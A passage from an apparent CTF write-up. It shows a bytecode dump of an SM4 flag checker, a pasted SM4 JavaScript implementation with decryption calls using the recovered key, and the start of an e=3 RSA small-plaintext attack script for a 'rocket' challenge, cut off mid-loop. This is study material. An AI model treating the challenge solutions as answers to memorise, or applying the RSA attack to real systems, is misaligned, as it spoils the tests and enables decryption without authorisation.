 330 : CBC_PUSH_NUMBER_POS_BYTE number:94
 332 : CBC_PUSH_NUMBER_POS_BYTE number:99
 334 : CBC_PUSH_NUMBER_POS_BYTE number:88
 336 : CBC_PUSH_NUMBER_POS_BYTE number:209
 338 : CBC_PUSH_NUMBER_POS_BYTE number:162
 340 : CBC_PUSH_NUMBER_POS_BYTE number:37
 342 : CBC_PUSH_NUMBER_POS_BYTE number:34
 344 : CBC_PUSH_NUMBER_POS_BYTE number:124
 346 : CBC_PUSH_NUMBER_POS_BYTE number:59
 348 : CBC_PUSH_NUMBER_POS_BYTE number:1
 350 : CBC_PUSH_NUMBER_POS_BYTE number:33
 352 : CBC_PUSH_NUMBER_POS_BYTE number:120
 354 : CBC_PUSH_NUMBER_POS_BYTE number:135
 356 : CBC_NEW byte_arg:16
 358 : CBC_ASSIGN_BLOCK
 359 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:7
 362 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:212
 365 : CBC_PUSH_NUMBER_0
 366 : CBC_PUSH_NUMBER_POS_BYTE number:70
 368 : CBC_PUSH_NUMBER_POS_BYTE number:87
 370 : CBC_PUSH_NUMBER_POS_BYTE number:159
 372 : CBC_PUSH_NUMBER_POS_BYTE number:211
 374 : CBC_PUSH_NUMBER_POS_BYTE number:39
 376 : CBC_PUSH_NUMBER_POS_BYTE number:82
 378 : CBC_PUSH_NUMBER_POS_BYTE number:76
 380 : CBC_PUSH_NUMBER_POS_BYTE number:54
 382 : CBC_PUSH_NUMBER_POS_BYTE number:2
 384 : CBC_PUSH_NUMBER_POS_BYTE number:231
 386 : CBC_PUSH_NUMBER_POS_BYTE number:160
 388 : CBC_PUSH_NUMBER_POS_BYTE number:196
 390 : CBC_PUSH_NUMBER_POS_BYTE number:200
 392 : CBC_PUSH_NUMBER_POS_BYTE number:158
 394 : CBC_NEW byte_arg:16
 396 : CBC_ASSIGN_BLOCK
 397 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:8
 400 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:234
 403 : CBC_PUSH_NUMBER_POS_BYTE number:191
 405 : CBC_PUSH_NUMBER_POS_BYTE number:138
 407 : CBC_PUSH_NUMBER_POS_BYTE number:210
 409 : CBC_PUSH_NUMBER_POS_BYTE number:64
 411 : CBC_PUSH_NUMBER_POS_BYTE number:199
 413 : CBC_PUSH_NUMBER_POS_BYTE number:56
 415 : CBC_PUSH_NUMBER_POS_BYTE number:181
 417 : CBC_PUSH_NUMBER_POS_BYTE number:163
 419 : CBC_PUSH_NUMBER_POS_BYTE number:247
 421 : CBC_PUSH_NUMBER_POS_BYTE number:242
 423 : CBC_PUSH_NUMBER_POS_BYTE number:206
 425 : CBC_PUSH_NUMBER_POS_BYTE number:249
 427 : CBC_PUSH_NUMBER_POS_BYTE number:97
 429 : CBC_PUSH_NUMBER_POS_BYTE number:21
 431 : CBC_PUSH_NUMBER_POS_BYTE number:161
 433 : CBC_NEW byte_arg:16
 435 : CBC_ASSIGN_BLOCK
 436 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:9
 439 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:224
 442 : CBC_PUSH_NUMBER_POS_BYTE number:174
 444 : CBC_PUSH_NUMBER_POS_BYTE number:93
 446 : CBC_PUSH_NUMBER_POS_BYTE number:164
 448 : CBC_PUSH_NUMBER_POS_BYTE number:155
 450 : CBC_PUSH_NUMBER_POS_BYTE number:52
 452 : CBC_PUSH_NUMBER_POS_BYTE number:26
 454 : CBC_PUSH_NUMBER_POS_BYTE number:85
 456 : CBC_PUSH_NUMBER_POS_BYTE number:173
 458 : CBC_PUSH_NUMBER_POS_BYTE number:147
 460 : CBC_PUSH_NUMBER_POS_BYTE number:50
 462 : CBC_PUSH_NUMBER_POS_BYTE number:48
 464 : CBC_PUSH_NUMBER_POS_BYTE number:245
 466 : CBC_PUSH_NUMBER_POS_BYTE number:140
 468 : CBC_PUSH_NUMBER_POS_BYTE number:177
 470 : CBC_PUSH_NUMBER_POS_BYTE number:227
 472 : CBC_NEW byte_arg:16
 474 : CBC_ASSIGN_BLOCK
 475 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:10
 478 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:29
 481 : CBC_PUSH_NUMBER_POS_BYTE number:246
 483 : CBC_PUSH_NUMBER_POS_BYTE number:226
 485 : CBC_PUSH_NUMBER_POS_BYTE number:46
 487 : CBC_PUSH_NUMBER_POS_BYTE number:130
 489 : CBC_PUSH_NUMBER_POS_BYTE number:102
 491 : CBC_PUSH_NUMBER_POS_BYTE number:202
 493 : CBC_PUSH_NUMBER_POS_BYTE number:96
 495 : CBC_PUSH_NUMBER_POS_BYTE number:192
 497 : CBC_PUSH_NUMBER_POS_BYTE number:41
 499 : CBC_PUSH_NUMBER_POS_BYTE number:35
 501 : CBC_PUSH_NUMBER_POS_BYTE number:171
 503 : CBC_PUSH_NUMBER_POS_BYTE number:13
 505 : CBC_PUSH_NUMBER_POS_BYTE number:83
 507 : CBC_PUSH_NUMBER_POS_BYTE number:78
 509 : CBC_PUSH_NUMBER_POS_BYTE number:111
 511 : CBC_NEW byte_arg:16
 513 : CBC_ASSIGN_BLOCK
 514 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:11
 517 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:213
 520 : CBC_PUSH_NUMBER_POS_BYTE number:219
 522 : CBC_PUSH_NUMBER_POS_BYTE number:55
 524 : CBC_PUSH_NUMBER_POS_BYTE number:69
 526 : CBC_PUSH_NUMBER_POS_BYTE number:222
 528 : CBC_PUSH_NUMBER_POS_BYTE number:253
 530 : CBC_PUSH_NUMBER_POS_BYTE number:142
 532 : CBC_PUSH_NUMBER_POS_BYTE number:47
 534 : CBC_PUSH_NUMBER_POS_BYTE number:3
 536 : CBC_PUSH_NUMBER_POS_BYTE number:255
 538 : CBC_PUSH_NUMBER_POS_BYTE number:106
 540 : CBC_PUSH_NUMBER_POS_BYTE number:114
 542 : CBC_PUSH_NUMBER_POS_BYTE number:109
 544 : CBC_PUSH_NUMBER_POS_BYTE number:108
 546 : CBC_PUSH_NUMBER_POS_BYTE number:91
 548 : CBC_PUSH_NUMBER_POS_BYTE number:81
 550 : CBC_NEW byte_arg:16
 552 : CBC_ASSIGN_BLOCK
 553 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:12
 556 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:141
 559 : CBC_PUSH_NUMBER_POS_BYTE number:27
 561 : CBC_PUSH_NUMBER_POS_BYTE number:175
 563 : CBC_PUSH_NUMBER_POS_BYTE number:146
 565 : CBC_PUSH_NUMBER_POS_BYTE number:187
 567 : CBC_PUSH_NUMBER_POS_BYTE number:221
 569 : CBC_PUSH_NUMBER_POS_BYTE number:188
 571 : CBC_PUSH_NUMBER_POS_BYTE number:127
 573 : CBC_PUSH_NUMBER_POS_BYTE number:17
 575 : CBC_PUSH_NUMBER_POS_BYTE number:217
 577 : CBC_PUSH_NUMBER_POS_BYTE number:92
 579 : CBC_PUSH_NUMBER_POS_BYTE number:65
 581 : CBC_PUSH_NUMBER_POS_BYTE number:31
 583 : CBC_PUSH_NUMBER_POS_BYTE number:16
 585 : CBC_PUSH_NUMBER_POS_BYTE number:90
 587 : CBC_PUSH_NUMBER_POS_BYTE number:216
 589 : CBC_NEW byte_arg:16
 591 : CBC_ASSIGN_BLOCK
 592 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:13
 595 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:10
 598 : CBC_PUSH_NUMBER_POS_BYTE number:193
 600 : CBC_PUSH_NUMBER_POS_BYTE number:49
 602 : CBC_PUSH_NUMBER_POS_BYTE number:136
 604 : CBC_PUSH_NUMBER_POS_BYTE number:165
 606 : CBC_PUSH_NUMBER_POS_BYTE number:205
 608 : CBC_PUSH_NUMBER_POS_BYTE number:123
 610 : CBC_PUSH_NUMBER_POS_BYTE number:189
 612 : CBC_PUSH_NUMBER_POS_BYTE number:45
 614 : CBC_PUSH_NUMBER_POS_BYTE number:116
 616 : CBC_PUSH_NUMBER_POS_BYTE number:208
 618 : CBC_PUSH_NUMBER_POS_BYTE number:18
 620 : CBC_PUSH_NUMBER_POS_BYTE number:184
 622 : CBC_PUSH_NUMBER_POS_BYTE number:229
 624 : CBC_PUSH_NUMBER_POS_BYTE number:180
 626 : CBC_PUSH_NUMBER_POS_BYTE number:176
 628 : CBC_NEW byte_arg:16
 630 : CBC_ASSIGN_BLOCK
 631 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:14
 634 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:137
 637 : CBC_PUSH_NUMBER_POS_BYTE number:105
 639 : CBC_PUSH_NUMBER_POS_BYTE number:151
 641 : CBC_PUSH_NUMBER_POS_BYTE number:74
 643 : CBC_PUSH_NUMBER_POS_BYTE number:12
 645 : CBC_PUSH_NUMBER_POS_BYTE number:150
 647 : CBC_PUSH_NUMBER_POS_BYTE number:119
 649 : CBC_PUSH_NUMBER_POS_BYTE number:126
 651 : CBC_PUSH_NUMBER_POS_BYTE number:101
 653 : CBC_PUSH_NUMBER_POS_BYTE number:185
 655 : CBC_PUSH_NUMBER_POS_BYTE number:241
 657 : CBC_PUSH_NUMBER_POS_BYTE number:9
 659 : CBC_PUSH_NUMBER_POS_BYTE number:197
 661 : CBC_PUSH_NUMBER_POS_BYTE number:110
 663 : CBC_PUSH_NUMBER_POS_BYTE number:198
 665 : CBC_PUSH_NUMBER_POS_BYTE number:132
 667 : CBC_NEW byte_arg:16
 669 : CBC_ASSIGN_BLOCK
 670 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:15
 673 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:24
 676 : CBC_PUSH_NUMBER_POS_BYTE number:240
 678 : CBC_PUSH_NUMBER_POS_BYTE number:125
 680 : CBC_PUSH_NUMBER_POS_BYTE number:236
 682 : CBC_PUSH_NUMBER_POS_BYTE number:58
 684 : CBC_PUSH_NUMBER_POS_BYTE number:220
 686 : CBC_PUSH_NUMBER_POS_BYTE number:77
 688 : CBC_PUSH_NUMBER_POS_BYTE number:32
 690 : CBC_PUSH_NUMBER_POS_BYTE number:121
 692 : CBC_PUSH_NUMBER_POS_BYTE number:238
 694 : CBC_PUSH_NUMBER_POS_BYTE number:95
 696 : CBC_PUSH_NUMBER_POS_BYTE number:62
 698 : CBC_PUSH_NUMBER_POS_BYTE number:215
 700 : CBC_PUSH_NUMBER_POS_BYTE number:203
 702 : CBC_PUSH_NUMBER_POS_BYTE number:57
 704 : CBC_PUSH_NUMBER_POS_BYTE number:72
 706 : CBC_NEW byte_arg:16
 708 : CBC_ASSIGN_BLOCK
 709 : CBC_PUSH_THREE_LITERALS ident:23->string(Array) const:30->number(462357) const:31->number(472066609)
 713 : CBC_PUSH_THREE_LITERALS const:32->number(943670861) const:33->number(1415275113) const:34->number(1886879365)
 717 : CBC_PUSH_THREE_LITERALS const:35->number(2358483617) const:36->number(2830087869) const:37->number(3301692121)
 721 : CBC_PUSH_THREE_LITERALS const:38->number(3773296373) const:39->number(4228057617) const:40->number(404694573)
 725 : CBC_PUSH_THREE_LITERALS const:41->number(876298825) const:42->number(1347903077) const:43->number(1819507329)
 729 : CBC_PUSH_THREE_LITERALS const:44->number(2291111581) const:45->number(2762715833) const:46->number(3234320085)
 733 : CBC_PUSH_THREE_LITERALS const:47->number(3705924337) const:48->number(4177462797) const:49->number(337322537)
 737 : CBC_PUSH_THREE_LITERALS const:50->number(808926789) const:51->number(1280531041) const:52->number(1752135293)
 741 : CBC_PUSH_THREE_LITERALS const:53->number(2223739545) const:54->number(2695343797) const:55->number(3166948049)
 745 : CBC_PUSH_THREE_LITERALS const:56->number(3638552301) const:57->number(4110090761) const:58->number(269950501)
 749 : CBC_PUSH_THREE_LITERALS const:59->number(741554753) const:60->number(1213159005) const:61->number(1684763257)
 753 : CBC_NEW byte_arg:32
 755 : CBC_ASSIGN_SET_IDENT ident:6->string(CK)
 757 : CBC_PUSH_THREE_LITERALS ident:23->string(Array) const:62->number(2746333894) const:63->number(1453994832)
 761 : CBC_PUSH_TWO_LITERALS const:64->number(1736282519) const:65->number(2993693404)
 764 : CBC_NEW byte_arg:4
 766 : CBC_ASSIGN_SET_IDENT ident:7->string(FK)
 768 : CBC_PUSH_LITERAL const:66->string(ctf{this_is_an_example})
 770 : CBC_ASSIGN_SET_IDENT ident:18->string(input)
 772 : CBC_PUSH_NUMBER_0
 773 : CBC_ASSIGN_SET_IDENT ident:19->string(num)
 775 : CBC_PUSH_LITERAL ident:23->string(Array)
 777 : CBC_NEW0
 778 : CBC_ASSIGN_SET_IDENT ident:20->string(message)
 780 : CBC_PUSH_NUMBER_0
 781 : CBC_MOV_IDENT reg:1
 783 : CBC_JUMP_FORWARD offset:32(->815)
 785 : CBC_MULTIPLY_TWO_LITERALS ident:19->string(num) const:67->number(256)
 788 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:18->string(input) const:68->string(charCodeAt)
 791 : CBC_PUSH_LITERAL reg:1
 793 : CBC_CALL1_PROP_PUSH_RESULT
 794 : CBC_ADD
 795 : CBC_ASSIGN_SET_IDENT_BLOCK ident:19->string(num)
 797 : CBC_MODULO_TWO_LITERALS reg:1 const:69->number(4)
 800 : CBC_EQUAL_RIGHT_LITERAL const:70->number(3)
 802 : CBC_BRANCH_IF_FALSE_FORWARD offset:11(->813)
 804 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:20->string(message) const:71->string(push)
 807 : CBC_PUSH_LITERAL ident:19->string(num)
 809 : CBC_CALL1_PROP_BLOCK
 810 : CBC_PUSH_NUMBER_0
 811 : CBC_ASSIGN_SET_IDENT_BLOCK ident:19->string(num)
 813 : CBC_PRE_INCR_IDENT reg:1
 815 : CBC_PUSH_TWO_LITERALS reg:1 ident:18->string(input)
 818 : CBC_PUSH_PROP_LITERAL const:72->string(length)
 820 : CBC_LESS
 821 : CBC_BRANCH_IF_TRUE_BACKWARD offset:36(->785)
 823 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:24->string(Math) const:73->string(ceil)
 826 : CBC_PUSH_PROP_LITERAL_LITERAL ident:20->string(message) const:72->string(length)
 829 : CBC_DIVIDE_RIGHT_LITERAL const:69->number(4)
 831 : CBC_CALL1_PROP_PUSH_RESULT
 832 : CBC_ASSIGN_SET_IDENT ident:21->string(count)
 834 : CBC_MULTIPLY_TWO_LITERALS ident:21->string(count) const:69->number(4)
 837 : CBC_ASSIGN_SET_IDENT ident:22->string(pad_len)
 839 : CBC_JUMP_FORWARD offset:7(->846)
 841 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:20->string(message) const:71->string(push)
 844 : CBC_PUSH_NUMBER_0
 845 : CBC_CALL1_PROP_BLOCK
 846 : CBC_PUSH_PROP_LITERAL_LITERAL ident:20->string(message) const:72->string(length)
 849 : CBC_LESS_RIGHT_LITERAL ident:22->string(pad_len)
 851 : CBC_BRANCH_IF_TRUE_BACKWARD offset:10(->841)
 853 : CBC_PUSH_THREE_LITERALS ident:23->string(Array) const:74->number(19088743) const:75->number(2309737967)
 857 : CBC_PUSH_TWO_LITERALS const:76->number(4275878552) const:77->number(1985229328)
 860 : CBC_NEW byte_arg:4
 862 : CBC_ASSIGN_SET_IDENT_BLOCK ident:25->string(key)
 864 : CBC_PUSH_THREE_LITERALS ident:23->string(Array) const:78->number(1605062385) const:79->number(-642825121)
 868 : CBC_PUSH_THREE_LITERALS const:80->number(2061445208) const:81->number(1405610911) const:82->number(1713399267)
 872 : CBC_PUSH_THREE_LITERALS const:83->number(1396669315) const:84->number(1081797168) const:85->number(605181189)
 876 : CBC_PUSH_THREE_LITERALS const:86->number(1824766525) const:87->number(1196148725) const:88->number(763423307)
 880 : CBC_PUSH_LITERAL const:89->number(1125925868)
 882 : CBC_NEW byte_arg:12
 884 : CBC_ASSIGN_SET_IDENT_BLOCK ident:26->string(ans)
 886 : CBC_PUSH_LITERAL ident:23->string(Array)
 888 : CBC_NEW0
 889 : CBC_ASSIGN_SET_IDENT_BLOCK ident:27->string(message_c)
 891 : CBC_PUSH_NUMBER_0
 892 : CBC_MOV_IDENT reg:1
 894 : CBC_JUMP_FORWARD offset:47(->941)
 896 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:20->string(message) const:90->string(splice)
 899 : CBC_PUSH_NUMBER_0
 900 : CBC_PUSH_NUMBER_POS_BYTE number:4
 902 : CBC_CALL2_PROP_PUSH_RESULT
 903 : CBC_MOV_IDENT reg:2
 905 : CBC_PUSH_THREE_LITERALS ident:15->string(encrypt) reg:2 ident:25->string(key)
 909 : CBC_CALL2_PUSH_RESULT
 910 : CBC_MOV_IDENT reg:3
 912 : CBC_PUSH_NUMBER_0
 913 : CBC_MOV_IDENT reg:4
 915 : CBC_JUMP_FORWARD offset:16(->931)
 917 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:27->string(message_c) const:71->string(push)
 920 : CBC_PUSH_THREE_LITERALS ident:28->string(parseInt) reg:3 reg:4
 924 : CBC_PUSH_PROP
 925 : CBC_PUSH_NUMBER_POS_BYTE number:16
 927 : CBC_CALL2_PUSH_RESULT
 928 : CBC_CALL1_PROP_BLOCK
 929 : CBC_PRE_INCR_IDENT reg:4
 931 : CBC_PUSH_TWO_LITERALS reg:4 reg:3
 934 : CBC_PUSH_PROP_LITERAL const:72->string(length)
 936 : CBC_LESS
 937 : CBC_BRANCH_IF_TRUE_BACKWARD offset:20(->917)
 939 : CBC_PRE_INCR_IDENT reg:1
 941 : CBC_LESS_TWO_LITERALS reg:1 ident:21->string(count)
 944 : CBC_BRANCH_IF_TRUE_BACKWARD offset:48(->896)
 946 : CBC_PUSH_LITERAL ident:27->string(message_c)
 948 : CBC_BRANCH_IF_FALSE_FORWARD offset:10(->958)
 950 : CBC_PUSH_THREE_LITERALS ident:29->string(print) ident:17->string(compare_array) ident:27->string(message_c)
 954 : CBC_PUSH_LITERAL ident:26->string(ans)
 956 : CBC_CALL2_PUSH_RESULT
 957 : CBC_CALL1_BLOCK
 958 : CBC_RETURN_FUNCTION_END
false

一开始用记事本打开snapshot的时候看到了sm4等关键词,猜测加密算法为sm4,符号没去找到了源码

https://github.com/qiyunlu/UESTC.graduation.docMaster/blob/d8970292ae9abc9fc44936f10b19ac1ad9b1caf7/public/SM2andSM4/js/sm4.js

/*! sm4-1.0.js (c) Windard Yang | <https://www.windard.com/>
 */
/*
 * sm4-1.0.js
 *
 * Copyright (c) 2014 Windard Yang (www.windard.com)
 */
/**
 * @fileOverview
 * @name sm4-1.0.js
 * @author Windard (www.windard.com)
 * @version 1.0.0 (2016-11-17)
 */

/* this is sm4 in javascript by windard , today is 2016 11-17 ,
 *I'm afraid that can I finished this project , but after all
 *in December, everything will be done , that's prefect
 */

/*
 * garbage , rubbish programe language, should havn't big decimal number
 * can't circular bitwise left shift, can do xor well
 */

/*
 * fuck it at all , finally finished it , and there has many other works need to do
 *
 */

var SboxTable = new Array();
SboxTable[0] = new Array(0xd6, 0x90, 0xe9, 0xfe, 0xcc, 0xe1, 0x3d, 0xb7, 0x16, 0xb6, 0x14, 0xc2, 0x28, 0xfb, 0x2c, 0x05);
SboxTable[1] = new Array(0x2b, 0x67, 0x9a, 0x76, 0x2a, 0xbe, 0x04, 0xc3, 0xaa, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99);
SboxTable[2] = new Array(0x9c, 0x42, 0x50, 0xf4, 0x91, 0xef, 0x98, 0x7a, 0x33, 0x54, 0x0b, 0x43, 0xed, 0xcf, 0xac, 0x62);
SboxTable[3] = new Array(0xe4, 0xb3, 0x1c, 0xa9, 0xc9, 0x08, 0xe8, 0x95, 0x80, 0xdf, 0x94, 0xfa, 0x75, 0x8f, 0x3f, 0xa6);
SboxTable[4] = new Array(0x47, 0x07, 0xa7, 0xfc, 0xf3, 0x73, 0x17, 0xba, 0x83, 0x59, 0x3c, 0x19, 0xe6, 0x85, 0x4f, 0xa8);
SboxTable[5] = new Array(0x68, 0x6b, 0x81, 0xb2, 0x71, 0x64, 0xda, 0x8b, 0xf8, 0xeb, 0x0f, 0x4b, 0x70, 0x56, 0x9d, 0x35);
SboxTable[6] = new Array(0x1e, 0x24, 0x0e, 0x5e, 0x63, 0x58, 0xd1, 0xa2, 0x25, 0x22, 0x7c, 0x3b, 0x01, 0x21, 0x78, 0x87);
SboxTable[7] = new Array(0xd4, 0x00, 0x46, 0x57, 0x9f, 0xd3, 0x27, 0x52, 0x4c, 0x36, 0x02, 0xe7, 0xa0, 0xc4, 0xc8, 0x9e);
SboxTable[8] = new Array(0xea, 0xbf, 0x8a, 0xd2, 0x40, 0xc7, 0x38, 0xb5, 0xa3, 0xf7, 0xf2, 0xce, 0xf9, 0x61, 0x15, 0xa1);
SboxTable[9] = new Array(0xe0, 0xae, 0x5d, 0xa4, 0x9b, 0x34, 0x1a, 0x55, 0xad, 0x93, 0x32, 0x30, 0xf5, 0x8c, 0xb1, 0xe3);
SboxTable[10] = new Array(0x1d, 0xf6, 0xe2, 0x2e, 0x82, 0x66, 0xca, 0x60, 0xc0, 0x29, 0x23, 0xab, 0x0d, 0x53, 0x4e, 0x6f);
SboxTable[11] = new Array(0xd5, 0xdb, 0x37, 0x45, 0xde, 0xfd, 0x8e, 0x2f, 0x03, 0xff, 0x6a, 0x72, 0x6d, 0x6c, 0x5b, 0x51);
SboxTable[12] = new Array(0x8d, 0x1b, 0xaf, 0x92, 0xbb, 0xdd, 0xbc, 0x7f, 0x11, 0xd9, 0x5c, 0x41, 0x1f, 0x10, 0x5a, 0xd8);
SboxTable[13] = new Array(0x0a, 0xc1, 0x31, 0x88, 0xa5, 0xcd, 0x7b, 0xbd, 0x2d, 0x74, 0xd0, 0x12, 0xb8, 0xe5, 0xb4, 0xb0);
SboxTable[14] = new Array(0x89, 0x69, 0x97, 0x4a, 0x0c, 0x96, 0x77, 0x7e, 0x65, 0xb9, 0xf1, 0x09, 0xc5, 0x6e, 0xc6, 0x84);
SboxTable[15] = new Array(0x18, 0xf0, 0x7d, 0xec, 0x3a, 0xdc, 0x4d, 0x20, 0x79, 0xee, 0x5f, 0x3e, 0xd7, 0xcb, 0x39, 0x48);

var CK = new Array(
    0x00070e15, 0x1c232a31, 0x383f464d, 0x545b6269,
    0x70777e85, 0x8c939aa1, 0xa8afb6bd, 0xc4cbd2d9,
    0xe0e7eef5, 0xfc030a11, 0x181f262d, 0x343b4249,
    0x50575e65, 0x6c737a81, 0x888f969d, 0xa4abb2b9,
    0xc0c7ced5, 0xdce3eaf1, 0xf8ff060d, 0x141b2229,
    0x30373e45, 0x4c535a61, 0x686f767d, 0x848b9299,
    0xa0a7aeb5, 0xbcc3cad1, 0xd8dfe6ed, 0xf4fb0209,
    0x10171e25, 0x2c333a41, 0x484f565d, 0x646b7279
);

var FK = new Array(0xa3b1bac6, 0x56aa3350, 0x677d9197, 0xb27022dc);

// function bigxor(a, b) {
//  if (a.toString(2).length < 33 && b.toString(2).length < 33){
//      return a ^ b
//  }
//  var abin = a.toString(2);
//  var bbin = b.toString(2);
//  var loggest = abin.length >= bbin.length ? abin.length : bbin.length;
//  abin = abin.length == loggest ? abin :"0".repeat(loggest - abin.length) + abin;
//  bbin = bbin.length == loggest ? bbin :"0".repeat(loggest - bbin.length) + bbin;
//  var result = "";
//  for (var i = loggest - 1; i >= 0; i--) {
//      result = abin[i] == bbin[i] ? '0'+result : '1'+result;
//  };
//  return parseInt(result, 2);
// }

function bigxor(a, b) {
    return a ^ b
}

// function leftshift(a, n, size=32) {
//  var result = new Array(size);
//  result.fill(0);
//  var bin = a.toString(2);
//  bin = bin.length == size ? bin :"0".repeat(size - bin.length) + bin;
//  for (var i = bin.length - 1; i >= 0; i--) {
//      result[(i - n + size)%size] = bin[i];
//  };
//  result = result.join("");
//  return parseInt(result, 2);
// }

function leftshift(a, n, size = 32) {
    n = n % size
    return (a << n) | (a >>> (size - n))
}

function prefixInteger(str, length) {
    return Array(length + 1).join("0").split("").concat(String(str).split(""))
        .slice(-length).join("");
}

// function sm4Sbox(a) {
//  var a1 = prefixInteger(a.toString(16),8).slice(0,2);
//  var a2 = prefixInteger(a.toString(16),8).slice(2,4);
//  var a3 = prefixInteger(a.toString(16),8).slice(4,6);
//  var a4 = prefixInteger(a.toString(16),8).slice(6,8);
//  var b1 = SboxTable[parseInt(a1[0], 16)][parseInt(a1[1], 16)];
//  var b2 = SboxTable[parseInt(a2[0], 16)][parseInt(a2[1], 16)];
//  var b3 = SboxTable[parseInt(a3[0], 16)][parseInt(a3[1], 16)];
//  var b4 = SboxTable[parseInt(a4[0], 16)][parseInt(a4[1], 16)];
//  return parseInt(prefixInteger(b1.toString(16), 2) + prefixInteger(b2.toString(16), 2) + prefixInteger(b3.toString(16), 2) + prefixInteger(b4.toString(16), 2) , 16)
// }

function sm4Sbox(a) {
    var b1 = SboxTable[(a & 0xf0000000) >>> 28][(a & 0x0f000000) >>> 24]
    var b2 = SboxTable[(a & 0x00f00000) >>> 20][(a & 0x000f0000) >>> 16]
    var b3 = SboxTable[(a & 0x0000f000) >>> 12][(a & 0x00000f00) >>> 8]
    var b4 = SboxTable[(a & 0x000000f0) >>> 4][(a & 0x0000000f) >>> 0]
    return (b1 << 24) | (b2 << 16) | (b3 << 8) | (b4 << 0)
}

function GET_ULONG_BE(a) {
    a = sm4Sbox(a)
    return bigxor(bigxor(bigxor(a, leftshift(a, 2)), bigxor(leftshift(a, 10), leftshift(a, 18))), leftshift(a, 24))
}

function PUT_ULONG_BE(b) {
    b = sm4Sbox(b)
    return bigxor(b, bigxor(leftshift(b, 13), leftshift(b, 23)));
}

function sm4_getkey(MK) {
    var K = new Array();
    var rk = new Array();
    K[0] = bigxor(MK[0], FK[0]);
    K[1] = bigxor(MK[1], FK[1]);
    K[2] = bigxor(MK[2], FK[2]);
    K[3] = bigxor(MK[3], FK[3]);

    for (var i = 0; i < 32; i++) {
        K[i + 4] = bigxor(K[i], PUT_ULONG_BE(bigxor(bigxor(K[i + 1], K[i + 2]), bigxor(K[i + 3], CK[i]))));
        rk[i] = K[i + 4].toString(16);
    }
    ;
    return rk;
}

function KJUR_encrypt_sm4(messsage, key, method = "cbc") {
    var MK = key;
    var X = messsage;
    var rk = sm4_getkey(MK);
    for (var i = 0; i < 32; i++) {
        X[i + 4] = bigxor(X[i], GET_ULONG_BE(bigxor(bigxor(X[i + 1], X[i + 2]), bigxor(X[i + 3], parseInt(rk[i], 16)))))
    }
    ;
    var Y = new Array(X[35].toString(16), X[34].toString(16), X[33].toString(16), X[32].toString(16))
    return Y;
}

function KJUR_decrypt_sm4(ciphertext, key, method = "cbc") {
    var MK = key;
    var X = ciphertext;
    var frk = sm4_getkey(MK);
    var rk = new Array()
    for (var i = frk.length - 1; i >= 0; i--) {
        rk[frk.length - 1 - i] = frk[i]
    }
    ;
    for (var i = 0; i < 32; i++) {
        X[i + 4] = bigxor(X[i], GET_ULONG_BE(bigxor(bigxor(X[i + 1], X[i + 2]), bigxor(X[i + 3], parseInt(rk[i], 16)))))
    }
    ;
    var Y = new Array(X[35].toString(16), X[34].toString(16), X[33].toString(16), X[32].toString(16))
    return Y;
}

ciphertext = new Array(1605062385, -642825121, 2061445208, 1405610911);
ciphertext2 = new Array(1713399267, 1396669315, 1081797168, 605181189)
ciphertext3 = new Array(1824766525, 1196148725, 763423307, 1125925868)
key = new Array(19088743, 2309737967, 4275878552, 1985229328);

console.log(KJUR_decrypt_sm4(ciphertext, key))
console.log(KJUR_decrypt_sm4(ciphertext2, key))
console.log(KJUR_decrypt_sm4(ciphertext3, key))

rocket

下了个断点,找到启动 rocket 的命令,发现是从当前 bin 中加载代码,找到对应位置搜索 “Input”,发现附近有一个很长的 hex 数据,又结合输出的内容都是 x ^ 3,猜测是 e = 3 的 rsa,使用如下脚本进行解密(e = 3 小明文攻击)

import gmpy2
import time
from Crypto.Util.number import long_to_bytes

n = 0xeb2bfe8de9bea9084b6c9ae8a80ed7d63d3f476d18749059cf5355de7e50a0e5caec565558f80c8b020343d13f4313adba67e9c7166a9e8c4f87ffbebd05c45f8249ac247cc33b6a728cecd50f3d4ae5d99a5eb1f4ddc1d180ea109e72310263e38d22b9967bd974be352eccc57dd758f2a8160204dd7a67357f7ec7e140186f825577f2ffe607bec21de9edfbcaaf227b711b14c7859455cc17e23642aac3f7f42f23e945ba5e7f6f1f008b24ed977f242f2fb9406848cb49c54af3f463c9609daa8ac3716c4d0d3fe6c1386298f481fcc20bed6ed078913fa04eeddd8033e7713efdae5f57603ab4305aefcfd205b2f315f392709d06bdfa23d6e89b9a617b
e = 3
res = 0
c = 7212272804013543391008421832457418223544765489764042171135982569211377620290274828526744558976950004052088838419495093523281490171119109149692343753662521483209758621522737222024221994157092624427343057143179489608942837157528031299236230089474932932551406181
for k in range(200000000):
